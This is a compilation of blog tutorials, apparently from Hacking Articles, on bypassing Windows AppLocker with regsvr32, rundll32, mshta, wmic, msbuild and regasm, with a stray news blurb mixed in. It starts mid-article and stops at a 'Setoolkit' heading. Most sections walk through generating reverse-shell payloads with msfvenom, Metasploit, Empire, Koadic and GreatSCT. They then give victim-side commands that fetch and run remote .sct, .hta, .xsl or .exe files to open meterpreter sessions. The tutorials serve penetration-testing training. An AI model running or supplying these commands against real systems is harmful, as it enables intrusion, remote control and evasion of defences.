  • exe : RegSvcs stands for Microsoft .NET Remote Registry Services it is known for .NET Services Installation.
  • exe : Regsvr32 is a command line utility for register and unregister OLE controls in the Windows Registry, such as DLLs and ActiveX controls.

git clone https://github.com/GreatSCT/GreatSCT.git
cd GreatSCT
cd setup
./setup.sh

Once it’s downloaded and running, type the following command to access the help commands:

use Bypass

Now to get the list of payloads type :

list

Generate malicious hta file 

Now from the list of payloads you can choose anyone for your desired attack. But for this attack we will use :

use mshta/shellcode_inject/base64_migrate.py

Once the command is execute, type :

generate

After executing generate command, it asks you which method you want to use. As we are going to use msfvenom type 1 to choose first option. Then press enter for meterpreter. Then provide lhost and lport i.e. 192.168.1.107 and 4321 respectively.

When generating the shellcode, it will ask you to give a name for a payload. By default it will take ‘payload’ as name. As I didn’t wanted to give any name, I simply pressed enter.

Now, it made two files. One resource file and other an hta file.

Now, firstly, start the python’s server in /usr/share/greatsct-output by typing:

python -m SimpleHTTPServer 80

Now execute the hta file in the command prompt of the victim’s PC.

mshta.exe http://192.168.1.107/payload.hta

Simultaneously, start the multi/handler using recourse file. For this, type:

msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

And voila! You have your session.

Visit here “Bypass Application Whitelisting using mshta.exe (Multiple Methods)” to learn more about mshta.exe techniques.

Generate malicious sct file 

Now from the list of payloads you can choose anyone for your desired attack. But for this attack we will use :

use regsvr/shellcode_iject/base64_migrate.py

Once the command is execute, type :

generate

Then it will ask you for payload. Just press enter as it will take windows/meterpreter/reverse_tcp as a default payload and that is the one we need. After that provide IP like here we have given 192.168.1.107 and the give port (any) as here you can see in the image below that we have given lport as 2345

After giving the details, it will ask you a name for your malware. By default it will set name ‘payload’ so either you can give name or just press enter for the default settings.

And just as you press enter it will generate two files. One of them will a resource file ad other will be .sct file.

And just as you press enter it will generate two files. One of them will a resource file ad other will be .sct file.

python -m SimpleHTTPServer 80

Now execute the .sct file in the run window of the victim’s PC as shown below

regsvr32 /u /n /s /i:http;//192.168.1.107/payload.sct

Simultaneously, start the multi/handler using recourse file. For this, type:

msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

And voila! You have your session.

Visit here “Bypass Application Whitelisting using regsrv32.exe (Multiple Methods)” to learn more about mshta.exe techniques.

Generate malicious dll file 

Now from the list of payloads you can choose anyone for your desired attack. But for this attack we will use :

use regasm/meterpreter/rev_tcp.py

Once the command is execute, type:

set lhost 192.168.1.107
generate

After giving the details, it will ask you a name for your malware. By default it will set name ‘payload’ so either you can give name or just press enter for the default settings.

And just as you press enter it will generate two files. One of them will a resource file ad other will be .dll file.

And just as you press enter it will generate two files. One of them will a resource file ad other will be .sct file.

python -m SimpleHTTPServer 80

Now place above generated dll file inside : C:\Windows\Microsoft.NET\Framework\v4.0.30319\v4.0.30319\ and then  execute the .dll file in the run window of the victim’s PC as shown below:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\v4.0.30319\regasm.exe /U payload.dll

Simultaneously, start the multi/handler using recourse file. For this, type:

msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

And voila! You have your session.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post GreatSct – An Application Whitelist Bypass Tool appeared first on Hacking Articles.

Facebook opens up on System that ‘protects Billions’

Facebook used a blog post on Friday to describe, in detail, the systems that it uses to secure its vast social network, including custom designed tools and so-called "red team" hacks.

The post Facebook opens up on System that ‘protects Billions’ appeared first on The Security Ledger.

Related Stories

Bypass Application Whitelisting using rundll32.exe (Multiple Methods)

This purpose to write this post is to demonstrate the most common and familiar techniques of whitelisting AppLocker bypass.  As we know for security reason the system admin add group policies to restrict app execution for local user. In our previous article, we had discussed on “Windows Applocker Policy – A Beginner’s Guide” as they defines the AppLocker rules for your application control policies and how to work with them. But today you will learn how to bypass Applocker policies with RunDLL files.

Tables of Content

  • Introduction
  • Working of DLL files
  • Advantages
  • Disadvantages
  • Different methods for AppLocker Bypass using DLL files
  • Conclusion

Introduction

DLL files and their Importance for window’s OS to work and it also determines the working of other programs that customizes your windows. Dynamic Link Library (DLL) files are the type of file which provides instructions to other programs on how to call upon certain things. Therefore, multiple software’s can share such DLL files, even simultaneously. In spite of being in the same format as .exe file, DLL files are not directly executable like .exe files. DLL file extensions can be : .dll(Dynamic Link Library), .OCX(ActiveX Controls), .CPL(Control Panel), .DRV(Device Drivers).

Working

When in use, DLL files are divided into sections. This makes working of DLL files easy and faster. Each section is installed in main program at run time. As each section is different and independent; load time is faster and is only done when the functionality of the said file is required. This ability also makes upgrades easier to apply without affecting other sections. For example: you have a dictionary program and new words are added every month, so for this all you have to do is update it; without requiring to install a whole another program for it.

Advantages

  • Uses fewer resources
  • Promotes modular architecture
  • Eases deployment and installation

Disadvantages

  • A dependent DLL is upgraded to a new version.
  • A dependent DLL is fixed.
  • A dependent DLL is overwritten with an earlier version.
  • A dependent DLL is removed from the computer.

Methods

  • Smb_Delivery
  • MSFVenom
  • Koadic
  • Get Command Prompt via cmd.dll
  • JSRat

SMB Delivery

So, our method is using smb_delivery. To use this method, open the terminal in kali and type the following commands ;

msfconsole

use exploit/windows/smb/smb_delivery
msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.107
msf exploit(windows/smb/smb_delivery) > exploit

Now run the malicious code through rundll32.exe in the windows machine to obtain meterpreter sessions.

As the above code will run, it will provide you with a command that is to be executed on the victim’s PC; in order to get a session. So copy and paste the said command in the run window of the victim’s PC as shown in the image below:

rundll3.exe \\192.168.1.107\ZtmW\test.dll,0

As soon as the command is executed, you will have your meterpreter session. To access the session type :

sessions 1
sysinfo

MSFVenom

Our second method is via MSFVenom. For the utilization of this method, type the following command in the terminal of kali :

msfvenom -p windows/meterpreter.reverse_tcp lhost=192.168.1.107 lport=1234 -f dll > 1.dll

Once the payload is created, run the following command in the run window of victim’s PC:

rundll32 shell32.dll,Control_RunDLL C:\Users\raj\Downloads\cmd.dll

Simultaneously, start the multi/handler to get a session by typing :

msfconsole

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.107
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit

Koadic

Our next method is using Koadic framework. Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. To know more about Koadic please read our detailed articled on the said framework through this link: https://www.hackingarticles.in/koadic-com-command-control-framework

Once the koadic is up and running, type:

use stager/js/rundll32_js
set SRVHOST 192.168.1.107
run

Running the exploit will give you a command. Copy that command from rundll32.exe to 6.0”) and paste it in the command prompt of the victims’ PC.

Once you run the command in the cmd, you will have your session. As shown in the following image.

To access the session type :

zombies 0

Get Command Prompt via cmd.dll 

Now the dilemma is, what to do if command prompt is blocked in victim’s PC.

If the command line is blocked, there is script developed by Didier Stevens. You can find them in the following link :

http://didierstevens.com/files/software/cmd-dll_v0_0_4.zip

By executing the above URL, you will download a zip file. Extract that zip file and use the following command to run the said file in run windows:

rundll32 shell32.dll,Control_RunDLL C:\Users\raj\Downloads\cmd.dll

As soon as you run the command, you will have unblocked the cmd. As shown below:

JSRat

Our next method of attacking regsvr32 is by using JSRat and you can download it from github. This is another very small command and control framework just like koadic and Powershell Empire for generating malicious task only for rundll32.exe and regsvr32.exe. JSRat will create a webserver and on that webserver we will find our .js file. To use this method type:

./JSRat.py -i 192.168.1.107 -p 4444

Once JSRat starts working, it will give you a link to open in browser. That webpage will have a code which is to be executed on the victim’s pc.

Therefore, open the http://192.168.1.107/wtf link in your browser. There you will find the said code as shown in the image below:

Run that code in the command prompt of the victims’ PC as shown:

And voila, you will have a session as the image below:

Conclusion

DLL files are collection of various codes and procedure held together. These files helps windows programs to execute accurately. These files were created for multiple programs to use them simultaneously. This technique helps in memory conservation. Therefore these files are important and required by windows to run properly without giving users any kind of problems. Hence, exploitation through such files is very efficient and lethal. And above presented methods are the different ways to do it.

AuthorYashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

The post Bypass Application Whitelisting using rundll32.exe (Multiple Methods) appeared first on Hacking Articles.

Bypass Application Whitelisting using regsrv32.exe (Multiple Methods)

This purpose to write this post is to demonstrate the most common and familiar techniques of whitelisting AppLocker bypass.  As we know for security reason the system admin add group policies to restrict app execution for local user. In our previous article, we had discussed on “Windows Applocker Policy – A Beginner’s Guide” as they defines the AppLocker rules for your application control policies and how to work with them. But today you will learn how to bypass Applocker policies with regsvr32.exe.

Tables of content

  • Introduction to regsvr
  • Working of regsvr
  • Multiple methods to attack regsvr

Introduction

Regsvr32 stands for Microsoft Register Server. It is a windows command-line utility tool. While regsvr32 causes problems sometimes; it’s an important file as its windows system file. The file is found in the subfolder of C:\Windows. This file is able to observe, track and influence other programs. It’s mainly used to register and unregister programs in windows. File extension for this is .exe and its process widely assists OLE (Object Linking and embedding), DLL (Data Link Libraries) and OCX (ActiveX control modules). The said process works in the background and can be seen via task manager. Its Microsoft’s one of the trusted files.

Working

Information about programs associated with regsvr32 is added to windows, when you register a DLL file in regsvr32. These defences are then accessed to understand where the program data is and how to interact with it. As while registering a DLL file, information is added to central to directory so that it can be used by the windows. The whole path of these files literally has the executable code and due to this windows can call upon specific functions and use them to call executable code. These files are very convenient as when a software is updated, these file automatically call upon the updated version; in short it helps avoid the version problems of a software. Usually this file is not commonly used except for registering and unregistering DLL files.

RegSvr32.exe has the following command-line options:

Syntax: Regsvr32 [/s][/u] [/n] [/i[:cmdline]] <dllname>

/u – Unregister server
/i – Call DllInstall passing it an optional [cmdline]; when it is used with /u, it calls dll uninstall
/n – do not call DllRegisterServer; this option must be used with /i
/s – Silent; display no message boxes

To know more about it, visit here: https://support.microsoft.com/en-us/help/249873/how-to-use-the-regsvr32-tool-and-troubleshoot-regsvr32-error-messages

Multiple Methods

  • Web delivery
  • Empire
  • Manual
  • MSFVenom
  • Koadic
  • JSRat
  • GreatSCT

Web Delivery

This module quickly fires up a web server that serves a payload. The provided command which will allow for a payload to download and execute. It will do it either specified scripting language interpreter or “squiblydoo” via regsvr32.exe for bypassing application whitelisting. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command: e.g. Command Injection.

Regsvr32 uses “squiblydoo” technique for bypassing application whitelisting. The signed Microsoft binary file, Regsvr32, is able to request a .sct file and then execute the included PowerShell command inside of it. Both web requests (i.e., the .sct file and PowerShell download/execute) can occur on the same port. “PSH (Binary)” will write a file to the disk, allowing for custom binaries to be served up to be downloaded/executed.

use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 3
msf exploit (web_delivery)> set payload php/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.1.109
msf exploit (web_delivery)>set srvhost 192.168.1.109
msf exploit (web_delivery)>exploit

Copy the highlighted text shown in below:

Once the exploit is running; you will have a URL made for you. Run that URL in the command prompt of the Victim’s PC as shown below:

regsvr32 /s /n /u /i:http://192.168.1.109:8080/xo31Jt5dIF.sct scrobj.dll

Once you hit enter after the command, you will have your session. Type ‘sysinfo’ for the information of the PC as shown in the image below:

PowerShell Empire

For our next method of regsvr Attack we will use empire. Empire is a post-exploitation framework. Till now we have pairing our .sct tacks with metasploit but in this method we will use empire framework. It’s solely python based powershell windows agent which make it quite useful. Empire is developed by @harmj0y@sixdub@enigma0x3rvrsh3ll@killswitch_gui, and @xorrior. You can download this framework from https://github.com/EmpireProject/Empire.

To have a basic guide of Empire, please visit our article introducing empire à https://www.hackingarticles.in/hacking-with-empire-powershell-post-exploitation-agent/

Once the empire framework is started, type listener to check if there are any active listeners. As you can see in the image below that there are no active listeners. So to set up a listener, type :

uselistner http
set Host http://192.168.1.109
execute

With the above commands, you will have an active listener. Type back to go out of listener so you can initiate your powershell.

Once you are out the listener, you need to use an exploit to create your malicious file. A stager, in empire, is a snippet of code that allows our malicious code to be run via the agent on the compromised host. Which means to create an exploit, we will have to use stager. Therefore, type :

usestager windows/launcher_sct
set listener http
execute

After the execution of execute command, usestager will create a launcher.sct in /tmp. Now to get session start the python server by typing:

python -m SimpleHTTPServer 8080

As the server is on, the only step left is to execute our malware in the victim’s PC. For this, type the following command in the command prompt :

regsvr /s /n /u /i:http://192.168.1.109:8080/tmp/launcher.sct scrobj.dll

In the above command we have used port 8080 because our server of python is activated on the same port.

Once the above is executed as told, you will receive a session. To access the session type :

interact 9ATUX4M7

9ATUX4M7 : is a agent/session name. this will vary from session to session.

Inject PowerShell code in sct File (Manual Method)

Our next method manual with a help of an exploit. The exploit we will use will help us to create a powershell code. So let’s first create our powershell and for this go to the terminal of kali and type 

After running this exploit, it will show you the powershell code on the terminal screen as shown in following image :

use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 2
msf exploit (web_delivery)> set payload windows/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.1.109
msf exploit (web_delivery)>set srvhost 192.168.1.109
msf exploit (web_delivery)>exploit

Copy the highlighted text shown in below:

Regsvr32 is a command-line utility to register and unregister OLE controls, such as DLLs and ActiveX controls in the Windows Registry. Regsvr32.exe is installed in the %systemroot%\System32 folder in Windows XP and later versions of Windows.

Now we need to create .sct file in order for our attack to run. We found a script online to create a .sct file. You can access the link for the script by clicking  here. The script is shown in image below 

Copy the powershell code which was created by web_delivery and paste it in the above script where it says “calc.exe” as shown in the image below and then finally save it with .sct extension.

Then repeat above step to run .sct file with regsvr32.exe in the victim’s PC:

regsvr32 /u /n /s /i:http://192.168.1.109/1.sct scrobj.dll

As soon as the above command is executed, you will have your session through web_delivery. To access the sessioni type ‘sessions 1’ and ‘info’ to have basic information of the system.

MsfVenom

Our next method is to use msfvenom. Through this method we will create a two .sct, one to download our malware and another to execute it.  But first let’s get going with msfvenom and for that type :

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f exe > shell.exe

Start up the python server using following command:

python -m SimpleHTTPServer 80

And simultaneously, in the same script, used in the previous method inject certutil.exe command to call the shell.exe file from remote server. Therefore, instead of “calc .exe” write the following and save file again with .sct extension:

certutil.exe -urlcache -split -f http://192.168.1.109/shell.exe

We have used curtutil here as it allows to download a file in windows and also saved file as 3.sct.

Now, run the above script using following command:

regsvr32 /u /n /s /i:http;//192.168.1.109/3.sct scrobj.dll

We will create another file to execute our previous file “shell.exe”. For that again take the same script and where its written “calc.exe”; therefore write :

cd /k cd c:\Users\raj & shell.exe

This we have saved script as 4.sct and again run this script using the following command :

regsvr32 /u /n /s /i:http;//192.168.1.109/4.sct scrobj.dll

Side by side start up the multi handler too, to get a session. Hence, type :

use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit

After running the command in victim’s PC, u will have meterpreter session.

Koadic

Our next method is using Koadic. Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. To know more about Koadic please read our detailed articled on the said framework through this link: https://www.hackingarticles.in/koadic-com-command-control-framework

Once the koadic is up and running, type:

use stager/js/regsvr
set srvhost 192.168.1.107
run

After this, type the following in the command prompt of the victim’s:

regsvr32 /u /n /s /i:http;//192.168.1.107:9998/uWBjv scrobj.dll

Once you run the above command, you will have a session. To access the session type :

zombie 0

JSRat

Our next method of attacking regsvr32 is by using JSRat and you can download it from github. This is another very small command and control framework just like koadic and Powershell Empire for generating malicious task only for rundll32.exe and regsvr32.exe. JSRat will create a webserver and on that webserver we will find our .sct file. To use this method type:

./JSRat.py -I 192.168.1.107 -p 4444

Running the above command will start webserver.

Open this in your browser as shown below. Here, you will find the .sct file that you need to run on your victim’s PC.

As we have got the command, run the command in the run window as shown in the image below:

After executing the command in the run window you will have a session as shown:

GreatSCT

GreatSCT is tool that allows you to use Metasploit exploits and lets it bypass most anti-viruses. GreatSCT is current under support by @ConsciousHacker. You can download it from

https://github.com/GreatSCT/GreatSCT

Once its downloaded and running, type the following command to access the modules :

use Bypass

Then type ‘list’  to get the list of modules.

List of modules will appear as shown in image below :

From the list of modules choose the following :

use regsvr/shellcode_iject/base64_migrate.py
generate

After the above commands, type 1 to choose MSFVenom

Then it will ask you for payload. Just press enter as it will take windows/meterpreter/reverse_tcp as a default payload and that is the one we need. After that provide IP like here we have given 192.168.1.107 and the give port (any) as here you can see in the image below that we have given lport as 2345

After giving the details, it will ask you a name for your malware. By defualt it will set name ‘payload’ so either your can give name or just press enter for the default settings.

And just as you press enter it will generate two files. One of then will a resource file ad other will be .sct file.

Now, firstly, start the python’s server in /usr/share/greatsct-output by typing :

python -m SimpleHTTPServer 80

Now execute the .sct file in the run window of the victim’s PC as shown below.

Simultaneously, start the multi/handler using recourse file. For this, type :

msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

And you have meterpreter session.

Conclusion

Using regsvr32 to gain a session is write unusual way but it’s very important. And so above mentioned methods uses different tools and software to allow us to perform this attack.

AuthorYashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

The post Bypass Application Whitelisting using regsrv32.exe (Multiple Methods) appeared first on Hacking Articles.

Bypass Application Whitelisting using wmic.exe (Multiple Methods)

This purpose to write this post is to demonstrate the most common and familiar techniques of whitelisting AppLocker bypass.  As we know for security reason the system admin add group policies to restrict app execution for local user. In our previous article, we had discussed on “Windows Applocker Policy – A Beginner’s Guide” as they defines the AppLocker rules for your application control policies and how to work with them. But today you will learn how to bypass Applocker policies with wmic.exe.

Table of Content

Introduction to Wmic.exe

Exploiting Techniques

  • Koadic
  • Powershell Empire
  • Link hta within XSL code

Wmic.exe

The WMIC utility is a Microsoft tool provides a WMI command-line interface that is used for a variety of administrative functions for local and remote machine and also used to wmic query such as system settings, stop processes and execute scripts locally or remotely. Therefore, it can invoke XSL script (eXtensible Stylesheet Language).

Exploiting Techniques

Koadic

We will generate a malicious XSL file with the help of koadic which is a Command & Control tool which is quite similar to Metasploit and Powershell Empire.

To know how koadic works, read our article from here: https://www.hackingarticles.in/koadic-com-command-control-framework/

Once installation gets completed, you can run ./koadic file to start koadic and start with loading the sta/js/wmic stager by running the following command and set SRVHOST where the stager should call home.

use stager/js/wmic
set SRVHOST 192.168.1.107
run

Execute WMIC following command to download and run the malicious XSL file from a remote server:

wmic os get /FORMAT:"http://192.168.1.107:9996/g8gkv.xsl"

Once the malicious XSL file will get executed on target machine, you will have a Zombie connection just like metasploit.

PowerShell Empire

For our next method of wmic Attack we will use empire. Empire is a post-exploitation framework. Till now we have pairing our xsl tacks with metasploit but in this method we will use empire framework. It’s solely python based powershell windows agent which make it quite useful. Empire is developed by @harmj0y, @sixdub, @enigma0x3, rvrsh3ll, @killswitch_gui, and @xorrior. You can download this framework from https://github.com/EmpireProject/Empire.

To have a basic guide of Empire, please visit our article introducing empire:

https://www.hackingarticles.in/hacking-with-empire-powershell-post-exploitation-agent/

Once the empipre framework is started, type listener to check if there are any active listeners. As you can see in the image below that there are no active listeners. So to set up a listener type :

uselistner http
set Host http://192.168.1.107
set port 80
execute

With the above commands, you will have an active listener. Type back to go out of listener so that you can initiate your powershell.

For our Msbuild attack we will use stager.  A stager, in empire, is a snippet of code that allows our malicious code to be run via the agent on the compromised host. So, for this type:

usestager windows/launcher_xml
set listener http
execute

Usestager will create a malicious code file that will be saved in the /tmp named launcher.xml.

We have use python http server to transfer this file inside victim’s machine

And once the file runs, we will have the result on our listener. Run the file in your victim’s by typing following command:

wmic process get brief /format:"http://192.168.1.107:8080/launcher.xsl"

To see if we have any session open type ‘agents’. Doing so, will show you the name of the session you have. To access that session type :

interact Z639YHPA
sysinfo

Link hta within XSL code

As we know, wmic can execute any file or script remotely, so we will link a hta file within XSL code. An XSL file will contain a link, to download and execute a malicious hta file via mshta.exe, which is officially tiggered by wmic.

Therefore, let’s generate an hta file with the help of Metasploit:

use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109
msf exploit(windows/misc/hta_server) > exploit

Now copy the URL and place inside the XSL code, because they have ability to execute language script of Micorsoft.

Then, we have created a “payload.xsl “file, you can take help from this link for writing XSL code and then place the link of hta file as shown below.

Now again we need to execute XSL file through wmic.exe with the help of following command:

wmic os get /FORMAT:"http://192.168.1.109/payload.xsl"

Once the above command is executed you will have a session open. To access the session, type:

sessions 1

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Bypass Application Whitelisting using wmic.exe (Multiple Methods) appeared first on Hacking Articles.

Bypass Application Whitelisting using msbuild.exe (Multiple Methods)

This purpose to write this post is to demonstrate the most common and familiar techniques of whitelisting AppLocker bypass.  As we know for security reason the system admin add group policies to restrict app execution for local user. In our previous article, we had discussed on “Windows Applocker Policy – A Beginner’s Guide” as they defines the AppLocker rules for your application control policies and how to work with them. But today you will learn how to bypass Applocker policies with MSbuild.exe.

Table of Content

Introduction to MSbuild.exe

Exploiting Techniques

  • Generate CSharp file with Msfvenom
  • Generate XML file to Exploit MSbuild
  • Nps_payload Script
  • Powershell Empire
  • GreatSCT

Introduction to MSbuild.exe

The Microsoft Build Engine is a platform for building applications. This engine, which is also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software. Visual Studio uses MSBuild, but it doesn’t depend on Visual Studio. By invoking msbuild.exe on your project or solution file, you can organize and build products in environments where Visual Studio isn’t installed.

Visual Studio uses MSBuild to load and build managed projects. The project files in Visual Studio (.csproj.vbproj.vcxproj, and others) contain MSBuild XML code.

Exploiting Techniques:

Generate CSharp file with Msfvenom

We use Microsoft Visual Studio to create C # (C Sharp) programming project with a *.csproj suffix that saved in MSBuild format, so that it can be compiled with the MSBuild platform into an executable program.

With the help of a malicious build we can obtain a reverse shell of victim’s machine. Therefore, now we will generate our file.csproj file and for that, first generate a shellcode of c# via msfvenom. Then later that shellcode will be placed in our file.csproj as given below.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f csharp

The shellcode above should be placed in the XML file and you can download this XML file from github, which has the code that the MSBuild compiles and executes. This XML file should be saved as. file.csproj and must be run via MSBuild to get a Meterpreter session.

Note: Replace the shellcode value from your C# shellcode and then rename buf as shellcode as shown in the below image.

You can run MSBuild from Visual Studio, or from the Command Window. By using Visual Studio, you can compile an application to run on any one of several versions of the .NET Framework. For example, you can compile an application to run on the .NET Framework 2.0 on a 32-bit platform, and you can compile the same application to run on the .NET Framework 4.5 on a 64-bit platform. The ability to compile to more than one framework is named multitargeting.

To know more about MSbuild read from here: https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild?view=vs-2015

Now launch multi handler to get meterpreter session and run the file.csproj file with msbuild.exe at the target path: C:\Windows\Microsoft.Net\Framework\v4.0.30319 as shown.

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe file.csproj

Note: you need to save your malicious payload (XML / csproj) at this location:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ and then execute this file with command prompt.

use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit

As you can observe that, we have meterpreter session of the victim as shown below:

Generate XML file to Exploit MSbuild

As said above that MSBuild uses an XML-based project file format that’s straightforward and extensible, therefore we can rename above generated file.csproj as file.xml and again run the file.xml file with msbuild.exe at the target path: C:\Windows\Microsoft.Net\Framework\v4.0.30319 as shown.

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe file.xml

use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit

As you can observe that, we have meterpreter session of the victim as shown below:

Nps_Payload Script

This script will generate payloads for basic intrusion detection avoidance. It utilizes publicly demonstrated techniques from several different sources. Written by Larry Spohn (@Spoonman1091) Payload written by Ben Mauch (@Ben0xA) aka dirty_ben. You can download it from github.

Nps_payload generates payloads that could be execute with msbuild.exe and mshta.exe to get reverse connection of victim’s machine via meterpreter session.

Follow the below step for generating payload:

  1. Run ./nps_payload.py script, once you have downloaded nps payload from github.
  2. Press key 1 to select task “generate msbuild/nps/msf”
  3. Again Press key 1 to select payload “windows/meterpreter/reverse_tcp”

This will generate a payload in XML file, send this file at target location C:\Windows\Microsoft.Net\Framework\v4.0.30319 as done in previous method and simultaneously run below command in a new terminal to start listener.

msfconsole -r msbuld_nps.rc

Now repeat above step to execute msbuild_nps.xml with command prompt and obtain a reverse connection via meterpreter as shown below:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe msbuild_nps.xml

PowerShell Empire

For our next method of HTA Attack we will use empire. Empire is a post-exploitation framework. Till now we have pairing our hta tacks with metasploit but in this method we will use empire framework. It’s solely python based powershell windows agent which make it quite useful. Empire is developed by @harmj0y, @sixdub, @enigma0x3, rvrsh3ll, @killswitch_gui, and @xorrior. You can download this framework from https://github.com/EmpireProject/Empire.

To have a basic guide of Empire, please visit our article introducing empire:

https://www.hackingarticles.in/hacking-with-empire-powershell-post-exploitation-agent/

Once the empipre framework is started, type listener to check if there are any active listeners. As you can see in the image below that there are no active listeners. So to set up a listener type :

uselistner http
set Host http://192.168.1.107
set port 80
execute

With the above commands, you will have an active listener. Type back to go out of listener so that you can initiate your powershell.

For our Msbuild attack we will use stager.  A stager, in empire, is a snippet of code that allows our malicious code to be run via the agent on the compromised host. So, for this type:

usestager windows/launcher_xml
set listener http
execute

Usestager will create a malicious code file that will be saved in the /tmp named launcher.xml.

And once the file runs, we will have the result on our listener. Run the file in your victim’s by typing following command :

cd C:\Windows\Microsoft.NET\Framework\v4.0.30319\
MSBuild.exe launcher.xml

To see if we have any session open type ‘agents’. Doing so, will show you the name of the session you have. To access that session type :

interact A8H14C7L

The above command will give you the access to the session.

sysinfo
info

GreatSCT

GreatSCT is tool that allows you to use Metasploit exploits and lets it bypass most anti-viruses. GreatSCT is current under support by @ConsciousHacker. You can download it from here: https://github.com/GreatSCT/GreatSCT

Once it’s downloaded and running, type the following command to access the modules:

use Bypass

Now to see the list of payloads type :

list

Now from the list of payloads you can choose anyone for your desired attack. But for this attack we will use :

use msbuild/meterpreter/rev_tcp.py

Once the command is execute, type :

set lhost 192.168.1.107
generate

When generating the payload, it will ask you to give a name for a payload. By default it will take ‘payload’ as name. We had given msbuild as payload name where the output code will be save in XML.

Now, it made two files. One metasploit RC file and other an msbuild.xml file.

Now, firstly, start the python’s server in /usr/share/greatsct-output/source by typing:

python -m SimpleHTTPServer 80

Run the file in your victim’s by typing following command:

cd C:\Windows\Microsoft.NET\Framework\v4.0.30319\
MSBuild.exe msbuild.xml

Simultaneously, start the multi/handler using recourse file. For this, type :

msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

And voila! We have meterpreter session as shown here.

Reference: https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild?view=vs-2017

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Bypass Application Whitelisting using msbuild.exe (Multiple Methods) appeared first on Hacking Articles.

Bypass Application Whitelisting using mshta.exe (Multiple Methods)

Today we are going to learn about different methods of HTA attack. HTA is a useful and important attack because it can bypass application whitelisting.  In our previous article, we had discussed on “Windows Applocker Policy – A Beginner’s Guide” as they defines the AppLocker rules for your application control policies and how to work with them. But today you will learn how to bypass Applocker policies with mshta.exe.

 And to learn different methods of the said attack always come handy.

Table of content:

  • Introduction
  • Importance of HTA
  • Different methods
  • Conclusion

Introduction

For a long time, HTA files have been utilized as part of drive-by web assaults or droppers for malware within the wild. This includes doing something as basic as diverting mobile clients and educating that the website doesn’t, however, have mobile support. HTA files are well known within the world of cybersecurity in perspectives of both red teaming and blue teaming as one of those “retro” ways valuable to bypass application whitelisting.

Mshta.exe runs the Microsoft HTML Application Host, the Windows OS utility responsible for running HTA( HTML Application) files. HTML files that we can run JavaScript or Visual with. You can interpret these files using the Microsoft MSHTA.exe tool.

Importance

Finally, utilizing htaccess files or other strategies to divert based on browser sorts will help increase victory rates. Utilizing HTA files for web-based assaults. There’s a ton of adaptability inside an HTA file; you’ll effectively make it appear to be an Adobe updater, secure record per user, and a number of other things. It would moreover be useful to have the HTA file over HTTPS constraining discovery rates for companies not utilizing a few sorts of SSL interception/termination. HTA records helps to bypass antivirus since they are still not well identified. Last but not least HTA can also be used in web phishing, replacing old Java Applet attack.

Methods

There are multiple methods for an HTA attack. And we are going to shine light to almost all of them. Methods we are going to study are:

  • Metasploit
  • Setoolkit
  • Magic unicorn
  • Msfvenom
  • Empire
  • CactusTorch
  • Koadic
  • Great SCT

Metasploit

 Our first method is to use an inbuild exploit in Metasploit. For this, go to the terminal in your kali and type :

Msfconsole

Metasploit contain “HTA Web Server” module which generate malicious hta file. This module hosts an HTML Application (HTA) that when opened will run a payload via Powershell. When a user navigates to the HTA file they will be prompted by IE twice before the payload is executed. As the Metasploit will start up, type :

use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109
msf exploit(windows/misc/hta_server) > exploit

Once the exploit is executed, it will give you an URL link with the extension of .hta. Simultaneously, metasploit will start the server which allows you to share the file. This link you further have to run in your victim’s PC. Using the following command:

mshta.exe http://192.168.1.109:8080/pKz4Kk059Nq9.hta

The usual file extension of an HTA is .hta. We have use the above command because HTA is treated like any executable file with extension .exe, hence, executed via mshta.exe. When hta gets launched by mshta.exe it uses a signed Microsoft binary, allowing you to call PowerShell and inject a payload directly into memory.

Once the above command is executed you will have a session open. To access the session, type:

sessions 1

Thus, you will have your meterpreter session.

Setoolkit

